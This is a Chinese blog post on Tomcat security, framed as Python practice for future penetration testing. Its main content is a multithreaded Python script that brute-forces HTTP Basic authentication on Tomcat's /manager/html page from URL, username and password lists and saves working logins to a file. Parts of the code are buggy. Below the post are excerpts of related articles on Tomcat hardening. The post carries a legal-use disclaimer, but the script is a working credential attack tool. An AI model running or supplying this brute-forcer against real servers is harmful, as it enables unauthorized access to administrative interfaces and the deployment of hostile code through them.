tomcat安全

最新推荐文章于 2024-07-09 09:01:03 发布
最新推荐文章于 2024-07-09 09:01:03 发布
阅读量437 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pangyemeng/article/details/78032112
版权
说明:此文章紧做为培养安全开发人员安全意识,不能用于任何违法安全活动。

0x01 缘由

     最近在复习python这块的开发,于是与安全合起来学习之。

0x02 tomcat安全

     网上有很多介绍,大部分是对账号密码把控不严导致。传送:http://sec.chinabyte.com/442/12671442.shtml

0x03 一个小脚本复习python

     python 3.6  
#!/usr/bin/env python
 # -*- coding: utf-8 -*-
import sys
import requests
import threading
import queue
import time
import base64
import os
# headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+[url]http://www.googlebot.com/bot.html[/url])'}
u = queue.Queue()
p = queue.Queue()
n = queue.Queue()
# def urllist()
urls = open('url.txt', 'r', encoding='UTF-8')
def urllist():
    for url in urls:
        url = url.rstrip()
        u.put(url)
       
def namelist():
    names = open('name.txt', 'r', encoding='UTF-8')
    for name in names:
        name = name.rstrip()
        n.put(name)
  
def passlist():
    passwds = open('pass.txt', 'r', encoding='UTF-8')
    for passwd in passwds:
        passwd = passwd.rstrip()
        p.put(passwd)
  
def weakpass(url):
    namelist() #类似读出用户名到队列
    while not n.empty():
        name = n.get()
        # print name
        passlist() #类似读出密码到队列
        while not p.empty():
            good()
            # name = n.get()
            passwd = p.get()
            # print passwd
            headers = {'Authorization': 'Basic %s==' % (base64.b64encode((name + ':' + passwd).encode('utf-8')))} #构造头部
            try:
                #发送网络请求
                r = requests.get(url, headers=headers, timeout=3)
                # print r.status_code
                if r.status_code == 200:
                    print ('[turn]' + url + ' ' + name + ':' + passwd )
                    f = open('good.txt', 'a+')
                    f.write(url + ' ' + name + ':' + passwd + '\n')
                    f.close()
                else:
                    print( '[false]  ' + url + ' ' + name + ':' + passwd)
                    print( 'status code : %s  ' % r.status_code)
            except:
                print ('[except] ' + url + ' ' + name + ':' + passwd)
                print( 'status code : %s  ' % r.status_code)
  
def list():
    while u.empty():
        url = u.get()
        weakpass(url)
  
def thread():
    urllist() #将url读出放入队列
    tsk = []  #顶一个列表类型,存放url任务
    for i in open('url.txt').read().split('\n'):
        i = i + '/manager/html'
        t = threading.Thread(target=weakpass, args=(i,))  #创建线程 回调函数为weakpass
        tsk.append(t)
    for t in tsk: #开启线程
        t.start()
        t.join(1)
        # print "current has %d threads" % (threading.activeCount() - 1)
def good():
    good_ = 0
    for i in open('good.txt').read().split('\n'):
        good_ += 1
    os.system('title "weakpass------good:%s"' % (good_))
  
if __name__ == "__main__": #类似c中main函数,也可以不用类似shell脚本中
   # alllist()
    thread() #多线程处理目标url

0x04 总结

     此次主要复习request、queue、thread等工具,学习python主要为将来渗透过程打下基础。
     说明:此文章紧做为培养安全开发人员安全意识,不能用于任何违法安全活动。
庞叶蒙
关注
专栏目录
Tomcat 安全
王和平的第三个果园
11-27 637
配置安全 1) 删除webapps目录下的所有文件,禁用tomcat管理界面; 2) 注释或删除tomcat-users.xml文件内的所有用户权限; 3) 禁用8005端口; tomcat的server.xml中定义了可以直接关闭 Tomcat 实例的管理端口(默认8005)。可以通过 telnet 连接上该端口之后,输入 SHUTDOWN (此为默认关闭指令)即可关闭 Tomcat 实例(注意,此时虽然实例关闭了,但是进程还是存在的)。由于默认关闭Tomcat 的端口和指令都很简单。默认端口为8005,
Tomcat 安全配置与性能优化
weixin_34067102的博客
01-27 386
       Tomcat 是 Apache软件基金会下的一个免费、开源的WEB应用服务器,它可以运行在 Linux 和 Windows 等多个平台上,由于其性能稳定、扩展性好、免费等特点深受广大用户喜爱。目前,很多互联网应用和企业应用都部署在 Tomcat 服务器上,比如我们公司,哈。       之前我们 tomcat 都采用的是默认的配置,因此在安全方面还是有所隐患的。上周对测试环境的所有服...
Tomcat安全配置
云守护的专栏
09-23 4645
转自:http://drops.wooyun.org/%E8%BF%90%E7%BB%B4%E5%AE%89%E5%85%A8/8519 tomcat是一个开源Web服务器,基于Tomcat的Web运行效率高,可以在一般的硬件平台上流畅运行,因此,颇受Web站长的青睐。不过,在默认配置下其存在一定的安全隐患,可被恶意攻击。 0x00 测试环境 Win2003 Tom
Tomcat安全
u012233580的博客
02-12 381
    有些web应用程序的内容是有限制的,只允许有权限的用户在提供正确的用户名和密码的情况下才允许访问。Servlet通过配置部署文件web.xml来对安全性提供技术支持。    一个servlet通过一个叫authenticator的阀门(valve)来支持安全性限制。当容器启动的时候,authenticator被添加到容器的流水线上。    authenticator阀门会在包装器阀门之前被...
Tomcat安全
猎户星座
05-14 232
配置安全 一)删除webapps目录下的所有文件,禁用tomcat管理界面; 二)注释或者删除tomcat-users.xml文件内所有用户的权限; 三)更改关闭tomcat指令或者禁用 tomcat的server.xml中定义了可以直接关闭tomcat实例的管理端口(默认8005)。可以通过telnet连接上该端口后,输入SHUTDOWN(此为默认关闭指令)即可关闭tomcat实例。由于默认关闭tomcat的端口和指令都很简单,默认端口为8005,指令为SHUTDOWN。 方案一: 更改端口
tomcat安全加固手册
05-09
### Tomcat安全加固手册知识点详解 #### 一、Tomcat简介与重要性 Tomcat作为Apache软件基金会(Apache Software Foundation)Jakarta项目的核心组件之一,由Apache、Sun及其他多个机构和个人共同开发完成。得益于...
tomcat 安全规范(tomcat安全加固和规范)
09-29
**Tomcat安全规范详解** Tomcat作为一款广泛应用的开源Web服务器,因其高效的性能和良好的兼容性,被广大Web开发者所喜爱。然而,默认配置可能存在安全隐患,容易成为恶意攻击的目标。为了确保Tomcat安全运行,...
01-阿里云标准-Apache Tomcat 安全基线检查
03-25
阿里云标准-Apache Tomcat 安全基线检查旨在帮助用户遵循安全基线,检查Tomcat安全配置,确保Tomcat服务器的安全运行。 Tomcat 进程运行权限检测 在 Linux 系统中,Tomcat 服务器的进程权限非常重要。如果使用 ...
tomcat安全加固手册.pdf
05-22
tomcat安全加固手册》正是一份为了提升Tomcat服务器安全水平而编写的指南。 首先,手册强调了版本更新和补丁安装的重要性。在信息安全领域,保持软件更新是至关重要的一个环节,因为许多攻击手段都是针对已知漏洞...
不得不谈的Tomcat安全
Hi_alan的博客
11-01 694
1)删除webapps目录下的所有文件,禁用tomcat管理界面。 2)注释或删除tomcat-users.xml文件内的所有用户权限。 3)更改或关闭tomcat指令或禁用。 tomcat的sever.xml中定义了可以直接关闭Tomcat实例的管理端口(默认8005)。可以通过telnet连接上端口后,输入SHUTDOWN(此为默认关闭指令)即可关闭Tomcat实例(注意,此时虽然实例关闭了,...
Tomcat安全配置
得已
05-16 1534
安全是系统架构中最重要的关注点之一,通常情况下,所说的安全涵盖网络安全、数据安全、操作系统安全、服务器安全以及应用系统安全等诸多方面。Tomcat 是一个免费的开放源代码 的Web应用服务器,技术先进、性能稳定。由于它优秀的稳定性以及丰富的文档资料,广泛的使用人群,从而在开源领域受到广泛的青睐,因此,Tomcat安全也越来越受到重视。 Tomcat作为一款应用服务器,默认情况下可以满足多数场景的安全需求,但是在安全要求较高的情况下,仍需要从多个方面进行配置,已防止Tomcat管理后台被攻击等风险。Tomc
容易忽略的Tomcat安全问题
lisonghua的专栏
04-16 750
容易忽略的Tomcat安全问题- -                                       项目中需要对安全问题引起足够的重视,比如下列tomcat安全问题容易被忽略:server.xml默认有下面一行:这样允许任何人只要telnet到服务器的8005端口,输入"SHUTDOWN",然后回车,服务器立即就被关掉了。从安全的角度上考虑,我们需要把这个shutdown指令改成一
Tomcat安全加固--记一次救火经历
TenToEleven的博客
09-28 1627
-- “隐患险于明火,防范胜于救灾,责任重于泰山” 这篇文章中记录的事件发生在两年前,事件发生并处理后我在自己本地做了记录(本文中的主体内容都来源于这份两年前的记录),最近才在清理旧文件的时候翻了出来。之所以当时没有在博客中进行记录原因有二:第一,之前我太懒(是真的懒,懒到忘了自己博客早就已经注册过);第二,做了对应处理后,并没有完全的信心认为已经处理妥当。观望了这两年发现确实没再发生同样的事件...
《网络安全自学教程》- Tomcat基线检查加固
最新发布
wangyuxiang946的博客
07-09 8522
Tomcat安全配置规范,基线加固,安全加固。
Tomcat安全配置集锦
豆脑的博客
03-31 466
 如何预防后台被攻击?下面有几个关于Tomcat安全配置的小妙招!  Tomcat作为一款常用的应用服务器,是可以满足多数场景的安全需求,但是在安全要求较高的情况下,仍需要从多个方面进行配置,已防止Tomcat管理后台被攻击等风险。 目录: 1、删除用不到的自带应用  Tomcat安装完以后,在Webapps目录下面会有一些默认文件夹,  docs: Tomcat的本地说明文档,可删。  ex...
【技术分享】Tomcat基线安全
ff00yo的博客
04-18 1368
01前言 前几天@wilson师傅要测试线上命令监控功能,将我写的java-sec-code (https://github.com/JoyChou93/java-sec-code) 应用打包到线上的Tomcat进行命令执行测试,想到公司发布系统是在Tomat上运行的Java应用,所以去评估了公司发布系统的安全问题。结果发现一个很严重的安全漏洞,觉得有必要对Tomcat安全配置进行总结和说明。...
自定义tomcat服务器,tomcat服务器安全设置方法
weixin_34281191的博客
07-29 246
Tomcat是一个HTTP服务器,是Sun透过Java Community Process开发的、对广泛使用的Servlet和JavaServer Page(JSP)技术的正式参考实作。Servlet和JSP技术用于建构HTTP服务器应用程序。虽然Servlet技术中加入了许多特性(包括存取安全性、Session管理和执行绪控制)。JSP技术提供了一种处理动态生成的 HTML 页面的简便方法,这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值